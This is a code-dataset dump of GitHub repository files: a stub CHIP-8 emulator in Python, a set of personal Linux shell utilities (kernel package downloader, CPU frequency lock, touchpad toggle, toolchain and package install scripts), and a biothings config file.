refs/heads/master
| 2020-05-15T23:58:14.139380 | 2019-04-21T18:13:11 | 2019-04-21T18:13:11 | 182,567,126 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5852981805801392,
"alphanum_fraction": 0.628294050693512,
"avg_line_length": 18.486486434936523,
"blob_id": "7170714d8cbb926539c3a4c5094693d3365296ed",
"content_id": "4dbf43d69b936021b6975d6c3ae1dd9bb8714810",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 721,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 37,
"path": "/main.py",
"repo_name": "safder-aree/chip8emulator",
"src_encoding": "UTF-8",
"text": "# Import packages\nimport itertools\nimport os\nimport pyglet\nimport random\nimport sys\nimport time\n\n\ndef initialize(self):\n self.clear()\n self.memory = [0]*4096 # max 4096\n self.gpio = [0]*16 # max 16\n self.display_buffer = [0]*64*32 # 64*32\n self.stack = []\n self.key_inputs = [0]*16\n self.opcode = 0\n self.index = 0\n\n\n self.delay_timer = 0\n self.sound_timer = 0\n self.should_draw = False\n\n# Main loop structure\n\n\ndef main(self):\n\n # Initialize the variables and set registers to zero, reset key inputs\n self.initialize()\n self.load_rom(sys.argv[1])\n while not self.has_exit:\n self.dispatch_events()\n # Point to the offset\n self.cycle()\n self.draw()\n"
}
] | 1 |
rawmind/utils
|
https://github.com/rawmind/utils
|
033bdd45874f61b04c338ecfc466e735785061b5
|
cb1ad03a12e43300b47d1e5401bb3a6a9315e522
|
87a9db613d73e8882c8a2257eb39fa550d1e965c
|
refs/heads/master
| 2016-09-05T16:24:41.805404 | 2015-01-11T03:21:07 | 2015-01-11T03:21:07 | 29,079,120 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5404758453369141,
"alphanum_fraction": 0.5478912591934204,
"avg_line_length": 33.525333404541016,
"blob_id": "64d9e84555aa69821abfc5f78dc7f90fd5d493b3",
"content_id": "367648ded5ac5f8a16a3a8889a8caf786b75fe84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 13705,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 375,
"path": "/ullkd.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Copyright (C) 2012 Sorokin Alexei <[email protected]>\n# Civil <[email protected]>\n# Homepage: http://ubuntovod.ru/soft/ullkd.html\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://gnu.org/licenses/>.\n\nIsDebianBased() {\n if [ -r \"/etc/debian_version\" ]; then\n return 0;\n else\n return 1;\n fi;\n}\n\nIsRussian() {\n if [ -z $(echo \"${LANG}\" | grep \"^ru\") ] && [ -z $(echo \"${LANG}\" | grep \"^uk\") ]; then\n return 1;\n else\n return 0;\n fi;\n}\n\nUsage() {\n if ( ! IsRussian ); then\n echo -n \"Использование:\";\n else\n echo -n \"Usage:\";\n fi;\n echo \" \\`$(basename $0)' [-h] [-v] [-b] [-p] [-r] [-m ...]\";\n return 0;\n}\n\nErrorFunc() {\n Usage;\n if ( ! IsRussian ); then\n echo \"Try \\`$(basename $0)' -h for more information.\";\n else\n echo \"Запустите \\`$(basename $0)' для получения более подробной справки.\";\n fi;\n return 1;\n}\n\nParamCheck() {\n Title=\"ULLKD: Ubuntu Latest Linux Kernel Downloader v0.3\";\n while getopts \"bprm:hv\" ParamStr ${argv}; do\n case \"${ParamStr}\" in\n b)\n export UbuntuBranchMode=true;\n ;;\n p)\n export PfKernelMode=true;\n ;;\n r)\n export RemoveNonlatestKernelsMode=true;\n ;;\n m)\n export Mirror=\"${OPTARG}\";\n ;;\n h)\n echo \"${Title}\";\n Usage;\n if ( ! IsRussian ); then\n echo -e \"\\n -b install kernel from Ubuntu branch\";\n echo \" -p install pf-kernel build of NiGHt-LEshiY\";\n echo \" -r remove nonlatest kernels\";\n echo \" -m set download mirror (http://archive.ubuntu.com/ubuntu/ by default)\";\n echo \" -h print this help and exit\";\n echo \" -v display the current version and exit\";\n echo -e \"\\nReport problems to <[email protected]>.\";\n else\n echo -e \"\\n -b установить ядро из ветки Ubuntu\";\n echo \" -p установить сборку pf-kernel от NiGHt-LEshiY\";\n echo \" -r удалить непоследние ядра\";\n echo \" -m выставить зеркало загрузки (http://archive.ubuntu.com/ubuntu/ по умолчанию)\";\n echo \" -h вывод этой справки и выход\";\n echo \" -v вывод информации о версии и выход\";\n echo -e \"\\nСообщения о замеченных ошибках отправляйте по адресу <[email protected]>.\";\n fi;\n exit 0;\n ;;\n v)\n echo \"${Title}\";\n exit 0;\n ;;\n *)\n ErrorFunc;\n return 1;\n ;;\n esac;\n done;\n shift \"$((OPTIND - 1))\";\n return 0;\n}\n\nDownloader() {\n if [ -z \"$1\" ]; then\n if ( ! IsRussian ); then\n echo \"Please, define download URL.\" >&2;\n else\n echo \"Пожалуйта, укажите URL для загрузки.\" >&2;\n fi;\n return 1;\n fi;\n if [ -z \"$2\" ]; then\n Output=\"$(basename $1)\";\n else\n Output=\"$2\";\n fi;\n if ( which 'curl' > /dev/null ); then\n curl -s -o \"${Output}\" \"$1\";\n return $?;\n elif ( which 'wget' > /dev/null ); then\n wget -O \"${Output}\" -q \"$1\";\n return $?;\n else\n if ( ! IsRussian ); then\n echo \"Please, install curl or wget to proceed.\" >&2;\n else\n echo \"Пожалуйста, установите curl или wget для продолжения.\" >&2;\n fi;\n exit 1;\n fi;\n}\n\nKernelDownload() {\n if ( ! 
IsRussian ); then\n echo \"Initializing Linux kernel v${KernelVersion} packages download...\";\n else\n echo \"Инициализация загрузки пакетов ядра Linux v${KernelVersion}...\";\n fi;\n for Count in $(seq 0 $((URLCount- 1))); do\n if ( ! IsRussian ); then\n echo \"Downloading package $((Count + 1)) from ${URLCount}...\";\n else\n echo \"Загрузка пакета $((Count + 1)) из ${URLCount}...\";\n fi;\n if ( ! Downloader \"${URLs[${Count}]}\" ); then\n if ( ! IsRussian ); then\n echo \"An error occured, exiting...\" >&2;\n else\n echo \"Произошла ошибка, выход...\" >&2;\n fi;\n Finish;\n return 1;\n fi;\n done;\n return 0;\n}\n\nKernelInstall() {\n if ( ! IsRussian ); then\n echo -e \"\\nInstalling all downloaded packages...\";\n else\n echo -e \"\\nУстановка всех загруженных пакетов...\" >&2;\n fi;\n dpkg -i -R \"${PWD}\";\n apt-get install -f;\n return $?;\n}\n\nInstaller() {\n if ( ! KernelDownload ); then\n return 1;\n fi;\n KernelInstall;\n}\n\nRepoKernel() {\n if [ -z \"${Mirror}\" ]; then\n Mirror=\"http://archive.ubuntu.com/ubuntu/\";\n fi;\n Architecture=$(dpkg --print-architecture);\n\n export KernelVersion=$(Downloader \"${Mirror}/pool/main/l/linux/\" - | tr '\"' '\\n' | grep '^linux-image' | \\\n sed -n '$p' | tr '_' '\\n' | sed -n '2p');\n KernelVersionDot=$(echo \"${KernelVersion}\" | tr '-' '.');\n KernelVersionMajor=$(echo \"${KernelVersion}\" | sed -e 's/\\.[^.]*$//g');\n KernelMetaVersion=$(Downloader \"${Mirror}/pool/main/l/linux-meta/\" - | tr '\"' '\\n' | grep '^linux-image' | \\\n sed -n '$p' | tr '_' '\\n' | sed -n '2p');\n\n URLCount=6;\n URLs[0]=\"${Mirror}/pool/main/l/linux-meta/linux-image-generic_${KernelMetaVersion}_${Architecture}.deb\";\n URLs[1]=\"${Mirror}/pool/main/l/linux-meta/linux-headers-generic_${KernelMetaVersion}_${Architecture}.deb\";\n URLs[2]=\"${Mirror}/pool/main/l/linux/linux-image-${KernelVersionMajor}-generic_${KernelVersion}_${Architecture}.deb\";\n URLs[3]=\"${Mirror}/pool/main/l/linux/linux-image-extra-${KernelVersionMajor}-generic_${KernelVersion}_${Architecture}.deb\";\n URLs[4]=\"${Mirror}/pool/main/l/linux/linux-headers-${KernelVersionMajor}_${KernelVersion}_all.deb\";\n URLs[5]=\"${Mirror}/pool/main/l/linux/linux-headers-${KernelVersionMajor}-generic_${KernelVersion}_${Architecture}.deb\";\n\n Installer;\n ExitCode=$?;\n\n for Count in $(seq 0 $((URLCount - 1))); do\n Name=$(basename \"${URLs[${Count}]}\" | tr '_' '\\n' | sed -n '1p');\n if [[ ! \"${Name}\" == 'linux-image-generic' ]] && [[ ! 
\"${Name}\" == 'linux-headers-generic' ]]; then\n apt-mark auto \"${Name}\";\n fi;\n done;\n return \"${ExitCode}\";\n}\n\nPPAKernel() {\n Mirror=\"http://kernel.ubuntu.com/~kernel-ppa/mainline/\";\n Architecture=$(dpkg --print-architecture);\n\n KernelVersionMajor=$(Downloader \"${Mirror}\" - | grep -v '\\-rc' | \\\n sed -n 's/<a href=\"/\\n/p' | tr '\"' '\\n' | grep '^v' | sed -n '$p');\n KernelVersionData=$(Downloader ${Mirror}/${KernelVersionMajor} - | sed -n 's/<a href=\"/\\n/p' | \\\n tr '\"' '\\n' | grep -m 1 '^linux-image' | tr '_' '\\n' | sed -n '2p');\n export KernelVersion=$(echo \"${KernelVersionData}\" | sed -e 's/\\(.*\\)\\.\\([[:digit:]]*\\)/\\1/');\n\n URLCount=4;\n URLs[0]=\"${Mirror}/${KernelVersionMajor}/linux-headers-${KernelVersion}_${KernelVersionData}_all.deb\";\n URLs[1]=\"${Mirror}/${KernelVersionMajor}/linux-headers-${KernelVersion}-generic_${KernelVersionData}_${Architecture}.deb\";\n URLs[2]=\"${Mirror}/${KernelVersionMajor}/linux-image-${KernelVersion}-generic_${KernelVersionData}_${Architecture}.deb\";\n URLs[3]=\"${Mirror}/${KernelVersionMajor}/linux-image-extra-${KernelVersion}-generic_${KernelVersionData}_${Architecture}.deb\";\n\n Installer;\n return $?;\n}\n\nPfKernel() {\n Mirror=\"http://kernel.night-leshiy.ru/\";\n Architecture=$(dpkg --print-architecture);\n PageFile=\"/tmp/linux-kernel-packages/pf-kernel.htm\";\n\n if ( ! Downloader \"${Mirror}\" - > \"${PageFile}\" ); then\n if ( ! IsRussian ); then\n echo \"An error occured, exiting...\" >&2;\n else\n echo \"Произошла ошибка, выход...\" >&2;\n fi;\n Finish;\n return 1;\n fi;\n export KernelVersion=$(cat \"${PageFile}\" | grep '\\(ubuntu/\\|mint/\\)' | \\\n grep -E -o \"([0-9]+\\.){2}[0-9]([-a-zA-Z0-9]+)?(_[a-zA-Z0-9])?\" | sort -u);\n\n URLCount=2;\n if [[ $(cat \"${PageFile}\" | grep -c 'id=\"ubuntu\"' -) != 0 ]]; then\n URLs[0]=\"${Mirror}/ubuntu/linux-image-${KernelVersion}_${Architecture}.deb\";\n URLs[1]=\"${Mirror}/ubuntu/linux-headers-${KernelVersion}_${Architecture}.deb\";\n else\n URLs[0]=\"${Mirror}/mint/linux-image-${KernelVersion}_${Architecture}.deb\";\n URLs[1]=\"${Mirror}/mint/linux-headers-${KernelVersion}_${Architecture}.deb\";\n fi;\n rm -f \"${PageFile}\";\n\n Installer;\n return $?;\n}\n\nRemoveNonlatestKernels() {\n InstalledKernelPackages=$(dpkg --get-selections | sed -e 's/\\t//g;s/install//g' | grep '^linux');\n InstalledKernelPackages=$(echo \"${InstalledKernelPackages}\" | grep '^linux-image'; \\\n echo \"${InstalledKernelPackages}\" | grep '^linux-headers');\n SavedKernelPackagesCandidates=$(echo \"${InstalledKernelPackages}\" | grep '^linux-image');\n SavedKernelVersion=$(echo \"${SavedKernelPackagesCandidates}\" | tr ' ' '\\n' | grep -E -o \\\n '[[:digit:]]+\\.[[:digit:]]+(\\.[[:digit:]]+)?(-[[:digit:]]+)?(\\.[[:lower:]]+)?' | sort -u --version-sort | sed -n '$p');\n KernelVersionsToRemove=$(echo \"${InstalledKernelPackages}\" | tr ' ' '\\n' | grep -v \"\\-${SavedKernelVersion}\");\n if [[ -z \"${KernelVersionsToRemove}\" ]]; then\n if ( ! IsRussian ); then\n echo \"Nothing to remove, exiting...\";\n else\n echo \"Нечего удалять, выход...\";\n fi;\n else\n apt-get purge ${KernelVersionsToRemove};\n fi;\n return $?;\n}\n\nFinish() {\n cd '/';\n rm -rf \"/tmp/linux-kernel-packages\";\n}\n\nargc=\"$#\"; argv=\"$@\";\ntrap Finish EXIT;\nParamCheck;\nif [[ $? != 0 ]]; then\n exit 1;\nfi;\n\nif ( ! IsDebianBased ); then\n if ( ! 
IsRussian ); then\n echo \"Running distribution is not Debian-based, executing stopped for safety reason.\" >&2;\n else\n echo \"Запущенный дистрибутив не является основанным на Debian, выполнение остановлено по причинам безопасности.\" >&2;\n fi;\n exit 1;\nfi;\n\nif [[ \"$(id -u)\" != 0 ]]; then\n if ( which 'sudo' > /dev/null ); then\n sudo bash \"$0\" $@;\n exit $?;\n else\n su -c bash \"$0\" $@;\n exit $?;\n fi;\nfi;\n\nrm -rf \"/tmp/linux-kernel-packages\";\nmkdir -p \"/tmp/linux-kernel-packages\";\ncd \"/tmp/linux-kernel-packages\";\n\nif [[ \"${UbuntuBranchMode}\" == true ]]; then\n if ( ! IsRussian ); then\n Greeter=\"Latest Linux kernel packages will be installed from Ubuntu branch...\";\n else\n Greeter=\"Последние пакеты ядра Linux будут поставлены из ветки Ubuntu...\";\n fi;\nelif [[ \"${PfKernelMode}\" == true ]]; then\n if ( ! IsRussian ); then\n Greeter=\"Latest pf-kernel packages from NiGHt-LEshiY will be installed...\";\n else\n Greeter=\"Последние пакеты pf-kernel of NiGHt-LEshiY будут поставлены...\";\n fi;\nelif [[ \"${RemoveNonlatestKernelsMode}\" == true ]]; then\n if ( ! IsRussian ); then\n Greeter=\"All nonlatest Linux kernels will be removed...\";\n else\n Greeter=\"Все непоследние ядра Linux будут удалены...\";\n fi;\nelse\n if ( ! IsRussian ); then\n Greeter=\"Latest Linux kernel packages will be installed from kernel.ubuntu.com...\";\n else\n Greeter=\"Последние пакеты ядра Linux будут поставлены из kernel.ubuntu.com...\";\n fi;\nfi;\n\nif ( which 'cowsay' > /dev/null ); then\n cowsay -f \"tux\" \"${Greeter}\";\nelse\n echo -e \"${Greeter}\\n\";\nfi;\n\nif [[ \"${UbuntuBranchMode}\" == true ]]; then\n RepoKernel;\n ExitCode=$?;\nelif [[ \"${PfKernelMode}\" == true ]]; then\n PfKernel;\n ExitCode=$?;\nelif [[ \"${RemoveNonlatestKernelsMode}\" == true ]]; then\n RemoveNonlatestKernels;\n ExitCode=$?;\nelse\n PPAKernel;\n ExitCode=$?;\nfi;\n\nif [[ \"${ExitCode}\" == 0 ]]; then\n if ( ! IsRussian ); then\n echo -e \"\\nTask completed, thank you for using this script.\";\n echo \"Script author: XRevan86, inspired by ubuntovod.ru, licensed under GNU GPLv3+\";\n else\n echo -e \"\\nЗадача выполнена, спасибо за использование этого скрипта.\";\n echo \"Автор скрипта: XRevan86, вдохновлено ubuntovod.ru, лицензировано под GNU GPLv3+\";\n fi;\nfi;\nexit $?;"
},
{
"alpha_fraction": 0.624454140663147,
"alphanum_fraction": 0.6419214010238647,
"avg_line_length": 21.799999237060547,
"blob_id": "fed7e6804a5079ef17ae70155ce959c331e79270",
"content_id": "28b8e7320fbb805fadf6c81c82b92f285bb01bb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 10,
"path": "/touchpad.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\nfunction switch(){\nlocal device_id=14;\nlocal state=$(xinput --list-props $device_id | grep \"Device Enabled\" | cut -d\":\" -f2)\n[ $state -eq 0 ] && xinput --enable $device_id || xinput --disable $device_id\n}\n\nswitch\n\n"
},
{
"alpha_fraction": 0.7440677881240845,
"alphanum_fraction": 0.7661017179489136,
"avg_line_length": 30.052631378173828,
"blob_id": "428199f1c71c9f20c998e65e97450e801a343116",
"content_id": "61c3f1d62976336daa1cc60fae32358864741a4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 38,
"path": "/old_arm_toolset_deploy.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n#deb http://www.emdebian.org/debian/ squeeze main\n# deb http://backports.debian.org/debian-backports squeeze-backports main\n\n\napt-key adv --keyserver keyserver.ubuntu.com --recv-keys AED4B06F473041FA\napt-key adv --keyserver keyserver.ubuntu.com --recv-keys B5B7720097BB3B58\n\napt-get update\napt-get install emdebian-archive-keyring\napt-get update\napt-cache search armel\napt-get install linux-libc-dev-armel-cross\napt-get install libc6-armel-cross libc6-dev-armel-cross\napt-get install binutils-arm-linux-gnueabi\napt-get install gcc-4.4-arm-linux-gnueabi\napt-get install g++-4.4-arm-linux-gnueabi\n\napt-get install gcc-arm-linux-gnueabi\n\napt-get install xapt\nxapt -a armel libfoo-dev\napt-get install gdb-arm-linux-gnu\n\napt-get install pdebuild-cross dpkg-cross\n\n#To install uuencode, uudecode\napt-get install sharutils \n\n#ln -s -f /usr/bin/arm-linux-gnueabi-gcc /usr/bin/arm-eabi-gcc \n#ln -s -f /usr/bin/arm-linux-gnueabi-ar /usr/bin/arm-eabi-ar\n#ln -s -f /usr/bin/arm-linux-gnueabi-ld /usr/bin/arm-eabi-ld\n#ln -s -f /usr/bin/arm-linux-gnueabi-nm /usr/bin/arm-eabi-nm\n#ln -s -f /usr/bin/arm-linux-gnueabi-objcopy /usr/bin/arm-eabi-objcopy\n\n#check\narm-linux-gnueabi-gcc -v\n"
},
{
"alpha_fraction": 0.6378600597381592,
"alphanum_fraction": 0.6625514626502991,
"avg_line_length": 26,
"blob_id": "dc05e4021ca7907a7cbabfa951d5863d153990e3",
"content_id": "4fae7f722248deb6d6210fe0d55c5d8c297a035a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 9,
"path": "/java_install_alt.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nJDK_BIN_PATH=/usr/lib/jvm/jdk1.8.0_25/bin\n\nfor binary in $(ls $JDK_BIN_PATH/*); do\n name=$(basename $binary)\n update-alternatives --install /usr/bin/${name} ${name} ${binary} 1\n update-alternatives --set ${name} ${binary}\ndone\n"
},
{
"alpha_fraction": 0.6212121248245239,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 32,
"blob_id": "268577ca48d72a19063d1ebd96f26cc4e1d0b39c",
"content_id": "8ddfb0c48460e1e408b7d4c8fd0d52161a96fd98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 2,
"path": "/ps_snapshoot.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nps -eo pmem,pcpu,rss,vsize,args | sort -k 1 -r | less\n"
},
{
"alpha_fraction": 0.7339901328086853,
"alphanum_fraction": 0.7339901328086853,
"avg_line_length": 24.375,
"blob_id": "e77bf87cf377b651f02336da58649b5334fc628b",
"content_id": "f7b34e9ff9932bf875b695c653a2de28888c038b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 203,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/git_init_local_repo.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ngit init\ngit config --local user.name \"rawmind\"\ngit config --local user.email [email protected]\ngit remote add origin https://[email protected]/rawmind/${PWD##*/}\ntouch .gitignore\ngit add .gitignore\n"
},
{
"alpha_fraction": 0.6506224274635315,
"alphanum_fraction": 0.6647303104400635,
"avg_line_length": 21.69811248779297,
"blob_id": "78281a966a39825d7cdb4644d2f2459e5bf86c73",
"content_id": "ec1073a964c30848d2c86b30352ead9d051463e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1208,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 53,
"path": "/lock_freq.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# 1.0 nanosecond – cycle time for radio frequency 1 GHz (1×10^9 hertz), an inverse unit.\n\n\nA_FREQ=$(avblfreq=\"available frequency steps:\";cpupower -c 1 frequency-info | grep \"$avblfreq\" | sed \"s/$avblfreq//\" | sed \"s/ GHz,\\| GHz/GHz/g\" | xargs)\nFREQ=\"2.00GHz\"\nDEFAULT_GOVERNOR=\"powersave\"\n\n\n\nfunction check_freq(){\nif [[ \"$A_FREQ\" != *\"$FREQ\"* ]]; then\necho -e \"\\n$FREQ is not supported. See list: [ $A_FREQ ]\"\nexit 1;\nfi\n}\n\nfunction show_status(){\necho -e \"Current freq:\\n$(cpupower -c all frequency-info -mf)\"\necho -e \"Turbo boost: $(cat /sys/devices/system/cpu/cpufreq/boost)\"\n}\n\nfunction switch_on_lock(){\nshow_status\necho -e \"Want to freq: $FREQ on all cpus\"\ncheck_freq\nbash -c 'printf \"0\" > /sys/devices/system/cpu/cpufreq/boost'\ncpupower -c all frequency-set -f $FREQ > /dev/null \necho \"Done!\"\nshow_status\n}\n\nfunction switch_off_lock(){\ncpupower -c all frequency-set -g $DEFAULT_GOVERNOR > /dev/null\nbash -c 'printf \"1\" > /sys/devices/system/cpu/cpufreq/boost'\nshow_status\n}\n\n\n\nif [[ $EUID -ne 0 ]]; then\n echo \"This script must be run as root\" \n exit 1\nfi\n\ncase $1 in\n\t\"off\")\nswitch_off_lock;;\n\t\"on\")\nswitch_on_lock;;\n\t*)\necho \"Argument is missed! Expected [on, off]\";;\nesac\n\n\n"
},
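lock_freq.sh drives `cpupower` and the `/sys/devices/system/cpu/cpufreq/boost` toggle. A read-only Python sketch of the same status check, assuming the standard cpufreq sysfs layout with per-policy `scaling_cur_freq`/`scaling_governor` files (not every kernel/driver combination exposes the `boost` file):
```python
from pathlib import Path

# same file the script toggles with printf "0"/"1"
BOOST = Path("/sys/devices/system/cpu/cpufreq/boost")

def show_status():
    # 1 = turbo boost allowed, 0 = locked out
    print("Turbo boost:", BOOST.read_text().strip())
    # one policy directory per group of logical CPUs
    for policy in sorted(Path("/sys/devices/system/cpu/cpufreq").glob("policy*")):
        cur = int((policy / "scaling_cur_freq").read_text())  # value is in kHz
        gov = (policy / "scaling_governor").read_text().strip()
        print("%s: %.2f GHz (%s)" % (policy.name, cur / 1e6, gov))

if __name__ == "__main__":
    show_status()
```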
{
"alpha_fraction": 0.7706552743911743,
"alphanum_fraction": 0.7706552743911743,
"avg_line_length": 49.14285659790039,
"blob_id": "b6ae926b36a93556bd7dd564482df9ef808e4e93",
"content_id": "ae6041f3ed27ad61c3911eddc9fe78a02fe2822d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 14,
"path": "/README.md",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "# BASH Utils\n\n* clear_cache.sh - clear linux memory cache\n* deploy.sh - deploy ubuntu \n* git_init_local_repo.sh - preinstall new git repo\n* java_install_alt.sh - remove jdk/bin/ alternatives for debian-based distro\n* java_rm_alt.sh - install jdk/bin/ alternatives for debian-based distro\n* lock_freq.sh - manage CPU freequency and turboboost mode for Intel-based processors\n* old_arm_toolset_deploy.sh - deploy arm toolchain\n* ps_snapshoot.sh - process snapshoot\n* touchpad.sh - manage touchpad script\n* translate.sh - simple translate script from autodetected language to Russian (via Google translater)\n* ullkd.sh - upgrade to newest Linux kernel\n* python/pretty_xml.py - Python pretty print adapter\n"
},
{
"alpha_fraction": 0.7629629373550415,
"alphanum_fraction": 0.770370364189148,
"avg_line_length": 26,
"blob_id": "d0e7fb153069eb9e017a6fa4c79c8b9bdc748151",
"content_id": "42d19f532006b3df5f2e49d8a499d568bef6fd10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 5,
"path": "/python/pretty_xml.py",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "import sys\nfrom lxml import etree\nxml_str = sys.argv[0]\nroot = etree.fromstring(xml_str)\nprint etree.tostring(root, pretty_print=True)\n"
},
{
"alpha_fraction": 0.8048245906829834,
"alphanum_fraction": 0.8184210658073425,
"avg_line_length": 66.05882263183594,
"blob_id": "d3cd469963b4b10be28846f3e4e41d6358dfee8a",
"content_id": "b238441fac846d5402e19b437b4b0a2eb6624908",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2280,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 34,
"path": "/deploy.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\napt-get install alsa-base alsa-utils ant autoconf automake autopoint \\\nbash bash-builtins bash-completion bash-doc bash-static bc binutils \\\nbzip2 chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg-extra \\\ncmake colord coreutils cpio cpp cron cups curl dash dbus dbus-x11 dc \\\ndebconf debhelper debianutils dh-apparmor dh-autoreconf dh-python \\\ndoxygen dpkg espeak fakeroot firefox firefox-locale-en \\\nflashplugin-nonfree-extrasound \\\nfonts-dejavu fonts-dejavu-core fonts-dejavu-extra fonts-droid \\\nfonts-freefont-ttf fonts-horai-umefont fonts-kacst fonts-kacst-one \\\nfonts-khmeros-core fonts-lao fonts-lklug-sinhala fonts-lmodern fonts-lyx \\\nfonts-nanum fonts-opensymbol fonts-sil-abyssinica fonts-sil-gentium fonts-sil-gentium-basic \\\nfonts-sil-padauk fonts-takao-pgothic fonts-texgyre fonts-thai-tlwg fonts-tibetan-machine fonts-tlwg-garuda \\\nfonts-tlwg-kinnari fonts-tlwg-loma fonts-tlwg-mono fonts-tlwg-norasi fonts-tlwg-purisa \\\nfonts-tlwg-sawasdee fonts-tlwg-typewriter fonts-tlwg-typist fonts-tlwg-typo fonts-tlwg-umpush fonts-tlwg-waree \\\nfonts-unfonts-core fonts-wqy-microhei \\\nftp fuse g++ gcc gdb gimp git gitk gksu guitarix gzip ifupdown \\\nimagemagick indicator-application indicator-messages indicator-power indicator-sound \\\nlibreoffice iptables iw jack-capture jackd jackd2 jackd2-firewire \\\nlinux-headers-generic linux-image-generic linux-sound-base linux-source linuxdcpp \\\nlshw ltrace m4 make maven mawk mc mercurial mesa-utils mysql-client-5.6 \\\nmysql-client-core-5.6 mysql-common mysql-common-5.6 mysql-server-5.6 \\\nmysql-server-core-5.6 nasm net-tools \\\nnvidia-343 nvidia-343-uvm nvidia-opencl-icd-343 nvidia-prime nvidia-profiler \\\nnvidia-settings pastebinit patch pciutils perl pidgin \\\nplayonlinux ppp pppconfig pppoeconf pptp-linux pulseaudio python python-notify \\\npython2.7 python3 python3-pip qemu qjackctl qmmp rfkill sed smbclient socat \\\nsox speech-dispatcher speech-dispatcher-audio-plugins ssh stardict \\\nstardict-common stardict-gnome stardict-plugin stardict-plugin-espeak \\\nstardict-plugin-festival strace subversion sysv-rc sysv-rc-conf tcpdump \\\ntelnet texmaker timidity tuxguitar tuxguitar-alsa tuxguitar-jsa tuxguitar-oss \\\nunrar unzip vim vlc wget wine winetricks wireshark xfburn xinput xsel \\\nyakuake yasm zip \\\n"
}
] | 10 |
ravila4/biothings_docker
|
https://github.com/ravila4/biothings_docker
|
69a0b214a0c6458086d72e92e171d6fc934f1a40
|
7bfc928b617f6c89eef9667656bd803acff02200
|
5b9948dcd83d0d307bb74a331699f93b24a632de
|
refs/heads/master
| 2021-09-10T18:05:00.163970 | 2018-03-30T16:29:40 | 2018-03-30T16:29:40 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7566371560096741,
"alphanum_fraction": 0.7566371560096741,
"avg_line_length": 17.75,
"blob_id": "24b2529d9d254648fc1b73c5cd1c4166c2465a20",
"content_id": "f7ec3740fd041e99aa84a799385bb4882c7cd4ee",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 12,
"path": "/biothings.interactions/config.py",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "from config_www import *\nfrom config_hub import *\n\nGA_ACCOUNT = None\nGA_RUN_IN_PROD = True\n\nHIPCHAT_ROOM=None\nHIPCHAT_AUTH_TOKEN=None\n\nUSERQUERY_DIR='/data/userquery'\n\nAPP_GIT_REPOSITORY = '/usr/local/biothings.interactions'\n\n"
},
{
"alpha_fraction": 0.7067819237709045,
"alphanum_fraction": 0.7067819237709045,
"avg_line_length": 33.953487396240234,
"blob_id": "3a0bdba2c0bd618b5a971c5d48929736dffac05f",
"content_id": "e699ad2bc605fdd5b8807ed0ca0858e600536445",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1504,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 43,
"path": "/biothings.species/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
